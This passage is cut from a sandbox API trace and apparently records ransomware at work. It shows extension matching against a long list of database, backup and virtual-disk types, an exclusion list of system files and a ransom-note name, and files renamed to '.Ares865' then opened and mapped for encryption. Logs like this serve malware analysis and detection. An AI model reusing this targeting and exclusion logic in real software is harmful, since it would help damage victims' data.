-1 [0087.222] lstrlenW (lpString="odb") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.222] lstrlenW (lpString="odb") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.223] lstrlenW (lpString="oqy") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.223] lstrlenW (lpString="ora") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.223] lstrlenW (lpString="orx") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.223] lstrlenW (lpString="owc") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.223] lstrlenW (lpString="p96") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.223] lstrlenW (lpString="p97") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.223] lstrlenW (lpString="pan") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.223] lstrlenW (lpString="pdb") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.223] lstrlenW (lpString="pdm") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.223] lstrlenW (lpString="pnz") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.223] lstrlenW (lpString="qry") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.223] lstrlenW (lpString="qvd") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.223] lstrlenW (lpString="rbf") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.223] lstrlenW (lpString="rctd") returned 4 [0087.223] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.223] lstrlenW (lpString="rod") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.223] lstrlenW (lpString="rodx") returned 4 [0087.223] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.223] lstrlenW (lpString="rpd") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.223] lstrlenW (lpString="rsd") returned 3 [0087.223] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.223] lstrlenW (lpString="sas7bdat") returned 8 [0087.224] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.224] lstrlenW (lpString="sbf") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.224] lstrlenW (lpString="scx") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.224] lstrlenW (lpString="sdb") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.224] lstrlenW (lpString="sdc") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.224] lstrlenW (lpString="sdf") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.224] lstrlenW (lpString="sis") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.224] lstrlenW (lpString="spq") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.224] lstrlenW (lpString="te") returned 2 [0087.224] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.224] lstrlenW (lpString="teacher") returned 7 [0087.224] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.224] lstrlenW (lpString="tmd") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.224] lstrlenW (lpString="tps") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.224] lstrlenW (lpString="trc") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.224] lstrlenW (lpString="trc") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.224] lstrlenW (lpString="trm") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.224] lstrlenW (lpString="udb") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.224] lstrlenW (lpString="udl") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.224] lstrlenW (lpString="usr") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.224] lstrlenW (lpString="v12") returned 3 [0087.224] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.225] lstrlenW (lpString="vis") returned 3 [0087.225] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.225] lstrlenW (lpString="vpd") returned 3 [0087.225] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.225] lstrlenW (lpString="vvv") returned 3 [0087.225] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.225] lstrlenW (lpString="wdb") returned 3 [0087.225] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.225] lstrlenW (lpString="wmdb") returned 4 [0087.225] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.225] lstrlenW (lpString="wrk") returned 3 [0087.225] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.225] lstrlenW (lpString="xdb") returned 3 [0087.225] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.225] lstrlenW (lpString="xld") returned 3 [0087.225] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.225] lstrlenW (lpString="xmlff") returned 5 [0087.225] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.225] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.Ares865") returned 79 [0087.225] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.228] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.228] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1117024) returned 1 [0087.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.229] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.229] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.229] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.230] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x110e60, lpName=0x0) returned 0x15c [0087.231] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x110e60) returned 0x3030000 [0087.290] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.290] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.290] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0087.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0087.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.291] UnmapViewOfFile (lpBaseAddress=0x3030000) returned 1 [0087.301] CloseHandle (hObject=0x15c) returned 1 [0087.301] CloseHandle (hObject=0x118) returned 1 [0087.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.306] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x23960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="..") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="windows") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="temp") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="boot") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="ids.txt") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="perflogs") returned 1 [0087.306] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="MSBuild") returned 1 [0087.306] lstrlenW (lpString="XLINTL32.DLL.trx_dll") returned 20 [0087.306] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0087.306] lstrcpyW (in: lpString1=0x2cce468, lpString2="XLINTL32.DLL.trx_dll" | out: lpString1="XLINTL32.DLL.trx_dll") returned="XLINTL32.DLL.trx_dll" [0087.306] lstrlenW (lpString="XLINTL32.DLL.trx_dll") returned 20 [0087.307] lstrlenW (lpString="Ares865") returned 7 [0087.307] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.307] lstrlenW (lpString=".dll") returned 4 [0087.307] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".dll") returned 1 [0087.307] lstrlenW (lpString=".lnk") returned 4 [0087.307] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.307] lstrlenW (lpString=".ini") returned 4 [0087.307] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".ini") returned 1 [0087.307] lstrlenW (lpString=".sys") returned 4 [0087.307] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".sys") returned 1 [0087.307] lstrlenW (lpString="XLINTL32.DLL.trx_dll") returned 20 [0087.307] lstrlenW (lpString="bak") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.307] lstrlenW (lpString="ba_") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.307] lstrlenW (lpString="dbb") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.307] lstrlenW (lpString="vmdk") returned 4 [0087.307] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.307] lstrlenW (lpString="rar") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.307] lstrlenW (lpString="zip") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.307] lstrlenW (lpString="tgz") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.307] lstrlenW (lpString="vbox") returned 4 [0087.307] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.307] lstrlenW (lpString="vdi") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.307] lstrlenW (lpString="vhd") returned 3 [0087.307] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.307] lstrlenW (lpString="vhdx") returned 4 [0087.308] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.308] lstrlenW (lpString="avhd") returned 4 [0087.308] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.308] lstrlenW (lpString="db") returned 2 [0087.308] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.308] lstrlenW (lpString="db2") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.308] lstrlenW (lpString="db3") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.308] lstrlenW (lpString="dbf") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.308] lstrlenW (lpString="mdf") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.308] lstrlenW (lpString="mdb") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.308] lstrlenW (lpString="sql") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.308] lstrlenW (lpString="sqlite") returned 6 [0087.308] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.308] lstrlenW (lpString="sqlite3") returned 7 [0087.308] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.308] lstrlenW (lpString="sqlitedb") returned 8 [0087.308] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.308] lstrlenW (lpString="xml") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.308] lstrlenW (lpString="$er") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.308] lstrlenW (lpString="4dd") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.308] lstrlenW (lpString="4dl") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.308] lstrlenW (lpString="^^^") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.308] lstrlenW (lpString="abs") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.308] lstrlenW (lpString="abx") returned 3 [0087.308] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.309] lstrlenW (lpString="accdb") returned 5 [0087.309] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.309] lstrlenW (lpString="accdc") returned 5 [0087.309] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.309] lstrlenW (lpString="accde") returned 5 [0087.309] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.309] lstrlenW (lpString="accdr") returned 5 [0087.309] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.309] lstrlenW (lpString="accdt") returned 5 [0087.309] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.309] lstrlenW (lpString="accdw") returned 5 [0087.309] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.309] lstrlenW (lpString="accft") returned 5 [0087.309] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.309] lstrlenW (lpString="adb") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.309] lstrlenW (lpString="adb") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.309] lstrlenW (lpString="ade") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.309] lstrlenW (lpString="adf") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.309] lstrlenW (lpString="adn") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.309] lstrlenW (lpString="adp") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.309] lstrlenW (lpString="alf") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.309] lstrlenW (lpString="ask") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.309] lstrlenW (lpString="btr") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.309] lstrlenW (lpString="cat") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.309] lstrlenW (lpString="cdb") returned 3 [0087.309] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.309] lstrlenW (lpString="ckp") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.310] lstrlenW (lpString="cma") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.310] lstrlenW (lpString="cpd") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.310] lstrlenW (lpString="dacpac") returned 6 [0087.310] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.310] lstrlenW (lpString="dad") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.310] lstrlenW (lpString="dadiagrams") returned 10 [0087.310] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.310] lstrlenW (lpString="daschema") returned 8 [0087.310] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.310] lstrlenW (lpString="db-journal") returned 10 [0087.310] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.310] lstrlenW (lpString="db-shm") returned 6 [0087.310] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.310] lstrlenW (lpString="db-wal") returned 6 [0087.310] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.310] lstrlenW (lpString="dbc") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.310] lstrlenW (lpString="dbs") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.310] lstrlenW (lpString="dbt") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.310] lstrlenW (lpString="dbv") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.310] lstrlenW (lpString="dbx") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.310] lstrlenW (lpString="dcb") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.310] lstrlenW (lpString="dct") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.310] lstrlenW (lpString="dcx") returned 3 [0087.310] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.310] lstrlenW (lpString="ddl") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.311] lstrlenW (lpString="dlis") returned 4 [0087.311] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.311] lstrlenW (lpString="dp1") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.311] lstrlenW (lpString="dqy") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.311] lstrlenW (lpString="dsk") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.311] lstrlenW (lpString="dsn") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.311] lstrlenW (lpString="dtsx") returned 4 [0087.311] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.311] lstrlenW (lpString="dxl") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.311] lstrlenW (lpString="eco") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.311] lstrlenW (lpString="ecx") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.311] lstrlenW (lpString="edb") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.311] lstrlenW (lpString="epim") returned 4 [0087.311] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.311] lstrlenW (lpString="fcd") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.311] lstrlenW (lpString="fdb") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.311] lstrlenW (lpString="fic") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.311] lstrlenW (lpString="flexolibrary") returned 12 [0087.311] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.311] lstrlenW (lpString="fm5") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.311] lstrlenW (lpString="fmp") returned 3 [0087.311] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.311] lstrlenW (lpString="fmp12") returned 5 [0087.311] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.312] lstrlenW (lpString="fmpsl") returned 5 [0087.312] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.312] lstrlenW (lpString="fol") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.312] lstrlenW (lpString="fp3") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.312] lstrlenW (lpString="fp4") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.312] lstrlenW (lpString="fp5") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.312] lstrlenW (lpString="fp7") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.312] lstrlenW (lpString="fpt") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.312] lstrlenW (lpString="frm") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.312] lstrlenW (lpString="gdb") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.312] lstrlenW (lpString="gdb") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.312] lstrlenW (lpString="grdb") returned 4 [0087.312] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.312] lstrlenW (lpString="gwi") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.312] lstrlenW (lpString="hdb") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.312] lstrlenW (lpString="his") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.312] lstrlenW (lpString="ib") returned 2 [0087.312] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.312] lstrlenW (lpString="idb") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.312] lstrlenW (lpString="ihx") returned 3 [0087.312] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.312] lstrlenW (lpString="itdb") returned 4 [0087.312] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.312] lstrlenW (lpString="itw") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.313] lstrlenW (lpString="jet") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.313] lstrlenW (lpString="jtx") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.313] lstrlenW (lpString="kdb") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.313] lstrlenW (lpString="kexi") returned 4 [0087.313] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.313] lstrlenW (lpString="kexic") returned 5 [0087.313] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.313] lstrlenW (lpString="kexis") returned 5 [0087.313] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.313] lstrlenW (lpString="lgc") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.313] lstrlenW (lpString="lwx") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.313] lstrlenW (lpString="maf") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.313] lstrlenW (lpString="maq") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.313] lstrlenW (lpString="mar") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.313] lstrlenW (lpString="marshal") returned 7 [0087.313] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.313] lstrlenW (lpString="mas") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.313] lstrlenW (lpString="mav") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.313] lstrlenW (lpString="maw") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.313] lstrlenW (lpString="mdbhtml") returned 7 [0087.313] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.313] lstrlenW (lpString="mdn") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.313] lstrlenW (lpString="mdt") returned 3 [0087.313] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.314] lstrlenW (lpString="mfd") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.314] lstrlenW (lpString="mpd") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.314] lstrlenW (lpString="mrg") returned 3 [0087.314] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.314] lstrlenW (lpString="mud") returned 3 [0087.314] lstrcmpiW (lpString1="dll", 